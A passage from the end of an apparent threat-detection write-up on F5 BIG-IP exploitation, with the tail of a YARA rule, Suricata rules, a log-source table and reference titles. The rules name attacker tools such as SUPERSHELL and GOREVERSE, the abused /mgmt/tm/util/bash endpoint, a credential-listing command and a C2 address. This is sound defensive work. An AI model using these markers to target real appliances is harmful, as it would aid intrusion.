        reference = "CVE-2025-53521, CVE-2023-46747"
    strings:
        $tool1 = "/tmp/ss" fullword ascii
        $tool2 = "SNOWLIGHT" ascii
        $tool3 = "GOREVERSE" ascii
        $tool4 = "GOHEAVY" ascii
        $tool5 = "SUPERSHELL" ascii
        $cmd1 = "tmsh list auth user" ascii
        $cmd2 = "/mgmt/tm/util/bash" ascii
        $cmd3 = "sys-eicheck" ascii
        $f5_1 = "BIG-IP" ascii nocase
        $f5_2 = "F5 Networks" ascii
        $exploit1 = "/tmui/" ascii
        $exploit2 = "Apache JServ Protocol" ascii
    condition:
        (
            any of ($tool*) or
            (2 of ($cmd*) and 1 of ($f5_*)) or
            (1 of ($exploit*) and 1 of ($f5_*))
        )
}
```
Suricata Rules
SID 1000001 — Detects potential CVE-2025-53521 F5 BIG-IP APM exploitation attempt
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP APM CVE-2025-53521 Exploitation Attempt"; flow:established,to_server; content:"POST"; http_method; content:"/mgmt/tm/util/bash"; http_uri; content:"command"; http_client_body; depth:20; reference:cve,2025-53521; classtype:attempted-admin; sid:1000001; rev:1;)
SID 1000002 — Detects connection to UNC5174 C2 infrastructure
alert ip any any -> 61.239.68.73 any (msg:"ET MALWARE UNC5174 C2 Communication to Known Bad IP"; reference:url,cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect; classtype:trojan-activity; sid:1000002; rev:1;)
SID 1000003 — Detects F5 BIG-IP TMUI exploitation via CVE-2023-46747
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP TMUI CVE-2023-46747 Request Smuggling Attempt"; flow:established,to_server; content:"/tmui/"; http_uri; content:"Content-Length:"; http_header; pcre:"/Content-Length:\s*[0-9]+[\r\n]+.*Content-Length:/smi"; reference:cve,2023-46747; classtype:web-application-attack; sid:1000003; rev:1;)
SID 1000004 — Detects BRICKSTORM backdoor WebSocket communication
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE BRICKSTORM Backdoor WebSocket C2 Communication"; flow:established,to_server; content:"GET"; depth:4; content:"Upgrade|3a 20|websocket"; http_header; content:"Connection|3a 20|Upgrade"; http_header; content:"Sec-WebSocket"; http_header; threshold:type limit,track by_src,count 1,seconds 3600; reference:url,resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor; classtype:trojan-activity; sid:1000004; rev:1;)
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| F5 BIG-IP logs | T1190, T1059, T1562.001, T1136.001 | Enable audit logging and ASM security logging on all F5 devices. Configure remote syslog to SIEM. |
| Network traffic logs | T1190, T1071.001, T1105 | Full packet capture or NetFlow/IPFIX data for F5 management and data plane interfaces |
| DNS logs | T1071.001 | DNS query logging to detect C2 domain resolution |
| File integrity monitoring | T1562.001, T1105 | Monitor /tmp/, /etc/sysconfig/, and F5 system directories for unauthorized changes |
| Process execution logs | T1059, T1105 | Linux auditd or equivalent on F5 appliances to capture command execution |
Sources
- Attackers are exploiting RCE vulnerability in BIG-IP APM systems (CVE-2025-53521)
- CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation
- Bringing Access Back: Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect
- ED 26-01: Mitigate Vulnerabilities in F5 Devices
- Refresh: Compromising F5 BIG-IP With Request Smuggling | CVE-2023-46747
- F5 BIG-IP Source Code Leak Tied to BRICKSTORM Backdoor
- CVE-2025-53521 F5 BIG-IP APM Exploitation